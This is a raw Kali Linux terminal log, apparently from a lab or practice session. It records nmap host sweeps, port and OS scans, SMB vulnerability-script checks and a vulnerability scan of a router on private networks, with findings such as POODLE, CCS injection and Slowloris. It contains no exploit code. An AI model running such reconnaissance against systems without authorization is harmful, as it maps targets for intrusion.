Host is up (0.00034s latency).
MAC Address: F4:4D:30:51:16:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.11
Host is up (0.00073s latency).
MAC Address: F4:4D:30:51:C5:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.12
Host is up (0.00054s latency).
MAC Address: F4:4D:30:51:15:F6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.13
Host is up (0.00030s latency).
MAC Address: F4:4D:30:51:15:F7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.14
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:70:FC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.18
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6C:B2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.22
Host is up (0.00082s latency).
MAC Address: F4:4D:30:51:14:BC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.23
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:15:E5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.24
Host is up (0.00075s latency).
MAC Address: F4:4D:30:52:1E:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.26
Host is up (0.00021s latency).
MAC Address: F4:4D:30:51:15:4A (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.27
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:12:A6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.28
Host is up (0.00098s latency).
MAC Address: F4:4D:30:51:12:A4 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.29
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:71:D9 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.31
Host is up (0.00020s latency).
MAC Address: F4:4D:30:51:6C:5C (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.32
Host is up (0.00015s latency).
MAC Address: F4:4D:30:52:1E:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.33
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:6D:E7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.34
Host is up (0.00025s latency).
MAC Address: F4:4D:30:51:13:A7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.35
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:14:12 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.36
Host is up (0.00070s latency).
MAC Address: F4:4D:30:52:21:36 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.37
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:6D:A0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.38
Host is up (0.00056s latency).
MAC Address: F4:4D:30:51:12:B6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.39
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:14:AC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.40
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:6D:EC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.41
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00067s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00012s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00078s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00025s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 5.66 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# vim scan.txt
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.2.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:10 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00034s latency).
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.2
Host is up (0.000094s latency).
MAC Address: F4:4D:30:51:6D:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.3
Host is up (0.00071s latency).
MAC Address: F4:4D:30:51:6D:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.4
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:D7:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.6
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:13:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.7
Host is up (0.00023s latency).
MAC Address: F4:4D:30:51:16:E3 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.9
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:16:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.11
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:C5:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.12
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:15:F6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.13
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:15:F7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.14
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:70:FC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.18
Host is up (0.00013s latency).
MAC Address: F4:4D:30:51:6C:B2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.22
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:14:BC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.23
Host is up (0.00077s latency).
MAC Address: F4:4D:30:51:15:E5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.24
Host is up (0.00072s latency).
MAC Address: F4:4D:30:52:1E:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.26
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:15:4A (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.27
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:12:A6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.28
Host is up (0.00096s latency).
MAC Address: F4:4D:30:51:12:A4 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.29
Host is up (0.000090s latency).
MAC Address: F4:4D:30:51:71:D9 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.31
Host is up (0.00012s latency).
MAC Address: F4:4D:30:51:6C:5C (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.32
Host is up (0.00070s latency).
MAC Address: F4:4D:30:52:1E:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.33
Host is up (0.00013s latency).
MAC Address: F4:4D:30:51:6D:E7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.34
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:13:A7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.35
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:14:12 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.36
Host is up (0.00012s latency).
MAC Address: F4:4D:30:52:21:36 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.37
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:A0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.38
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:12:B6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.39
Host is up (0.00025s latency).
MAC Address: F4:4D:30:51:14:AC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.40
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:6D:EC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.41
Host is up (0.00077s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.000097s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00017s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00023s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00013s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00041s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.0014s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00035s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00071s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00018s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 1.66 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 192.168.2.1    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Error #487: Your port specifications are illegal.  Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 1-8888 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00040s latency).
Not shown: 8885 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 22.55 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'unicornscan' not found, but can be installed with:
apt install unicornscan
Do you want to install it? (N/y)y
apt install unicornscan
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package unicornscan
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# Unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'Unicornscan' not found, did you mean:
  command 'unicornscan' from deb unicornscan
Try: apt install <deb name>
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# Unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'Unicornscan' not found, did you mean:
  command 'unicornscan' from deb unicornscan
Try: apt install <deb name>
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# apt-get install unicornscan
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package unicornscan
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -O 192.168.2.1        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:17 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# namp -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse 
Command 'namp' not found, did you mean:
  command 'nama' from deb nama
  command 'wamp' from deb python3-autobahn
  command 'nmap' from deb nmap
  command 'pamp' from deb paml
  command 'nam' from deb nam
Try: apt install <deb name>
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:23 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00025s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:24 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00043s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script==smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:24 UTC
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:833: '=smb-vuln-ms10-061.nse' did not match a category, filename, or directory
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:833: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
        [C]: in ?

QUITTING!
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1                                
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:25 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:27 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
                                                                             
┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.2.208  netmask 255.255.255.0  broadcast 192.168.2.255
        inet6 fe80::3103:3e0a:d4e8:8ef8  prefixlen 64  scopeid 0x20<link>
        ether f4:4d:30:51:d6:df  txqueuelen 1000  (Ethernet)
        RX packets 1952  bytes 342996 (334.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22482  bytes 1329568 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 128  bytes 6440 (6.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 128  bytes 6440 (6.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                             
┌──(root㉿kali)-[/home/kali]
└─#

┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.19  --script=vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:18 UTC
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:18
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Completed NSE at 17:18, 10.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating ARP Ping Scan at 17:18
Scanning 192.168.0.19 [1 port]
Completed ARP Ping Scan at 17:18, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:18
Completed Parallel DNS resolution of 1 host. at 17:18, 0.00s elapsed
Initiating SYN Stealth Scan at 17:18
Scanning 192.168.0.19 [1000 ports]
Discovered open port 135/tcp on 192.168.0.19
Discovered open port 445/tcp on 192.168.0.19
Discovered open port 49158/tcp on 192.168.0.19
Discovered open port 49152/tcp on 192.168.0.19
Discovered open port 49153/tcp on 192.168.0.19
Discovered open port 49155/tcp on 192.168.0.19
Discovered open port 49154/tcp on 192.168.0.19
Discovered open port 139/tcp on 192.168.0.19
Completed SYN Stealth Scan at 17:18, 1.14s elapsed (1000 total ports)
Initiating Service scan at 17:18
Scanning 8 services on 192.168.0.19
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:00 remaining)
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:05 remaining)
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:13 remaining)
Completed Service scan at 17:19, 58.56s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.19
NSE: Script scanning 192.168.0.19.
Initiating NSE at 17:19
Completed NSE at 17:19, 8.05s elapsed
Initiating NSE at 17:19
Completed NSE at 17:19, 0.03s elapsed
Nmap scan report for 192.168.0.19
Host is up (0.00024s latency).
Not shown: 992 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
MAC Address: F4:4D:30:51:16:F7 (Elitegroup Computer Systems)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.087 days (since Fri Apr 21 15:14:06 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: B018; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.0.19

NSE: Script Post-scanning.
Initiating NSE at 17:19
Completed NSE at 17:19, 0.00s elapsed
Initiating NSE at 17:19
Completed NSE at 17:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.57 seconds
           Raw packets sent: 1083 (48.350KB) | Rcvd: 1017 (41.390KB)
                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.19  --script=vulnsamba-vuln-cve-2012-1182
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:23 UTC
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:833: 'vulnsamba-vuln-cve-2012-1182' did not match a category, filename, or directory
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:833: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
        [C]: in ?

QUITTING!
                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# vim new
                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.1  --script=vuln                        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:27 UTC
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:27
Completed NSE at 17:27, 10.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating ARP Ping Scan at 17:27
Scanning 192.168.0.1 [1 port]
Completed ARP Ping Scan at 17:27, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:27
Completed Parallel DNS resolution of 1 host. at 17:27, 0.00s elapsed
Initiating SYN Stealth Scan at 17:27
Scanning 192.168.0.1 [1000 ports]
Discovered open port 443/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 53/tcp on 192.168.0.1
Completed SYN Stealth Scan at 17:27, 4.75s elapsed (1000 total ports)
Initiating Service scan at 17:27
Scanning 3 services on 192.168.0.1
Completed Service scan at 17:30, 142.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.1
NSE: Script scanning 192.168.0.1.
Initiating NSE at 17:30
Completed NSE at 17:31, 75.29s elapsed
Initiating NSE at 17:31
Completed NSE at 17:31, 3.61s elapsed
Nmap scan report for 192.168.0.1
Host is up (0.00089s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
53/tcp  open  domain?
80/tcp  open  http     lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.35: 
|       CVE-2019-11072  7.5     https://vulners.com/cve/CVE-2019-11072
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2015-3200   5.0     https://vulners.com/cve/CVE-2015-3200
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|_      OSV:CVE-2022-41556      0.0     https://vulners.com/osv/OSV:CVE-2022-41556
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open  ssl/http lighttpd 1.4.35
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
|             Modulus Type: Non-safe prime
|             Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-server-header: lighttpd/1.4.35
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.35: 
|       CVE-2019-11072  7.5     https://vulners.com/cve/CVE-2019-11072
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2015-3200   5.0     https://vulners.com/cve/CVE-2015-3200
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|_      OSV:CVE-2022-41556      0.0     https://vulners.com/osv/OSV:CVE-2022-41556
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
